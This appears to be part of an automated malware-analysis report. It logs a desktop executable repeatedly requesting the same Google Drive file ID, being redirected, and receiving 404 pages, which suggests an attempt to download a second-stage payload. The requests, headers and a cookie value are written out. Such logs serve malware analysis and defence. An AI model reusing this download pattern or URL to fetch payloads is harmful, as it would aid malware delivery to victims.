                                                    2025-01-10 14:39:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 6c 54 5a 4f 63 38 6f 46 44 66 78 6c 63 7a 69 5a 42 58 42 74 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="elTZOc8oFDfxlcziZBXBtQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.752219172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:42 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:43 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:43 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-IGfBYNCdRgrMo9kffGC5XQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.752220142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:43 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:44 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC4g6KdTmPccLuYOMM569hG1DZJe1bAm1m9iXCBxkn0C8tuc8z6ldQ9gvVohXu8XWciqsQ6iTrs
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:44 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: script-src 'nonce-go566t6gLcqa_WBfPSl4AA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:44 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 64 66 58 53 7a 5f 73 7a 4e 48 34 44 6f 33 61 63 4c 50 41 69 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SdfXSz_szNH4Do3acLPAig">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.752221172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:45 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:45 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:45 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-el9EzKA_7I2bsvO3cs8kag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.752222142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:46 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:46 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC53BIWLhSH4CRJxxJ4Hbf_NKfjSbCjhipd0Ah-OyED6klhWJkMu_7HckAXIDX4XElktzP_BSIk
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:46 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: script-src 'nonce-gSRM6WAvQwqHabIx-Bk-lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:46 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 4d 79 63 57 54 74 7a 5a 71 5a 46 77 57 34 64 31 6f 57 68 4f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BMycWTtzZqZFwW4d1oWhOg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.752223172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:47 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:48 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:47 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-sNQIIhWxb0OQuDLrO8sLTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.752224142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:48 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:49 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgSYBtUHanGvGgUqGRx6T2mX52O4e885EmUmk4qiqieOZsym2WnS6wE_PMrFc71F9cnS
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:49 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-XA6CujBmxbACi7hIrnJZqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:49 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 64 6b 67 76 66 5a 51 73 6c 4f 4c 48 73 75 41 7a 63 5f 54 44 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="udkgvfZQslOLHsuAzc_TDA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.752225172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:49 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:50 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:50 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-NW5RhiGysCsBMI9SZHXVcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.752226142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:39:51 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:51 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6crM6FOApL-R-Y65smVto2_5SBvTfa13w3CwnHoIA_3kNbi7sJvhnVGC19Gy-Hb2oCRtcZ4nk
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:51 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-59TWLRx8l9JYw0Xroa2K2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
